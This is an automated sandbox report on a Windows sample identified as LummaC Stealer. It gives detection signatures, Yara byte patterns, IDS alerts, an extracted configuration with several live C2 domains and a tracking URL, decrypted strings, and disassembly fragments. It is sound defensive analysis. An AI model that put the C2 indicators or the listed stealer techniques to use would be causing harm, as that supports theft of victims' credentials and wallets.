Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g3toRYa6JE.exe

Overview

General Information

Sample name:g3toRYa6JE.exe
renamed because original name is a hash value
Original sample name:4e7e1578abc95ec22d6ed2c61bc5abf9.exe
Analysis ID:1589514
MD5:4e7e1578abc95ec22d6ed2c61bc5abf9
SHA1:d74fb310fdac0dd63483e23e1ca770bf31f91910
SHA256:d5639a2aa97a2b14d339613996322b1082b709bbf32b66fd38e17ed909fa678d
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • g3toRYa6JE.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\g3toRYa6JE.exe" MD5: 4E7E1578ABC95EC22D6ED2C61BC5ABF9)
    • 26A5.tmp.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\26A5.tmp.exe" MD5: 08494E6A1E788EA3259955A4524FDFEC)
      • WerFault.exe (PID: 8116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1012 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crowdwarek.shop", "skidjazzyric.click", "apporholis.shop", "versersleep.shop", "soundtappysk.shop", "femalsabler.shop", "chipdonkeruz.shop", "robinsharez.shop", "handscreamny.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1190:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x12d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:33.427318+010020283713Unknown Traffic192.168.2.963355104.102.49.254443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.479037+010020590351Domain Observed Used for C2 Detected192.168.2.9548701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.512266+010020590371Domain Observed Used for C2 Detected192.168.2.9507591.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.491901+010020590391Domain Observed Used for C2 Detected192.168.2.9631891.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.468764+010020590411Domain Observed Used for C2 Detected192.168.2.9518841.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.610364+010020590431Domain Observed Used for C2 Detected192.168.2.9585561.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.711611+010020590491Domain Observed Used for C2 Detected192.168.2.9626681.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.991559+010020590881Domain Observed Used for C2 Detected192.168.2.9622621.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.005795+010020590511Domain Observed Used for C2 Detected192.168.2.9576511.1.1.153UDP
    2025-01-12T17:45:32.466156+010020590511Domain Observed Used for C2 Detected192.168.2.9633541.1.1.153TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.501843+010020590571Domain Observed Used for C2 Detected192.168.2.9520701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:27.961623+010028032742Potentially Bad Traffic192.168.2.949707104.21.56.70443TCP
    2025-01-12T17:45:28.771496+010028032742Potentially Bad Traffic192.168.2.949708176.113.115.1980TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:34.023359+010028586661Domain Observed Used for C2 Detected192.168.2.963355104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE/Avira URL Cloud: Label: malware
    Source: https://crowdwarek.shop/Avira URL Cloud: Label: malware
    Source: https://post-to-me.com/Avira URL Cloud: Label: malware
    Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEQAvira URL Cloud: Label: malware
    Source: 3.3.26A5.tmp.exe.2190000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crowdwarek.shop", "skidjazzyric.click", "apporholis.shop", "versersleep.shop", "soundtappysk.shop", "femalsabler.shop", "chipdonkeruz.shop", "robinsharez.shop", "handscreamny.shop"], "Build id": "4h5VfH--"}
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeReversingLabs: Detection: 50%
    Source: g3toRYa6JE.exeVirustotal: Detection: 38%Perma Link
    Source: g3toRYa6JE.exeReversingLabs: Detection: 50%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeJoe Sandbox ML: detected
    Source: g3toRYa6JE.exeJoe Sandbox ML: detected
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: robinsharez.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: handscreamny.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: versersleep.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: crowdwarek.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: apporholis.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: femalsabler.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: soundtappysk.shop
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: skidjazzyric.click
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000003.00000003.1514348569.0000000002190000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

    Compliance

    barindex
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeUnpacked PE file: 0.2.g3toRYa6JE.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeUnpacked PE file: 3.2.26A5.tmp.exe.400000.0.unpack
    Source: g3toRYa6JE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.9:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:63355 version: TLS 1.2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B8C49 FindFirstFileExW,0_2_007B8C49
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0040A05C
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042D830
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043F0E0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B882
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp eax3_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B173
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A900
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B184
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then test esi, esi3_2_0043C9A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041B243
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00402210
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040AA32
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00428280
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F2A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042BB00
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041BB21
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AB2A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0040C334
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]3_2_0040C3EC
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp ecx3_2_0040D334
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00440BAB
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov eax, edi3_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B484
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00427490
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438520
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then push edi3_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B652
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B667
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00418672
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409E09
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp ecx3_2_0040CEC7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AEFF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov esi, ecx3_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_00408F90
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0214E249
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0214E249
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0214A2C3
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0217F347
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0215B3DA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0215B3EB
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0214A070
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov esi, ecx3_2_021560EF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_02157137
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp ecx3_2_0214D12E
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0215C148
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0215B166
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_021491F7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_021821EA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp ecx3_2_0214D59B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov eax, edi3_2_0215C667
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_02180694
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_02180694
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_021826D7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_021676F7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0215B6EB
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0215773F
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_02178787
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_02142477
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0215B4AA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_021684E7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0215F507
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0214C59B
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_021625E7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_02182A17
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0214BA6C
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0216DA97
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_02159AA7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0217BAD7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0217BAD7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_02157AE4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov edx, ecx3_2_02157AE4
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0215BAE9
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0215AB67
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_02166BA7
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then push edi3_2_0217C807
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0217C807
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_02158809
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_02147887
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_02147887
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0216B8B5
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_021558FA
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_02180E12
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0216EE1A
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0216BE07
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0216EE08
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0215BE2C
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0216DE57
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_02182F87
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then test esi, esi3_2_0217CC07
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then jmp eax3_2_02181C3E
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0214AC99
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0216ECC9
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 4x nop then mov ecx, eax3_2_02156D15
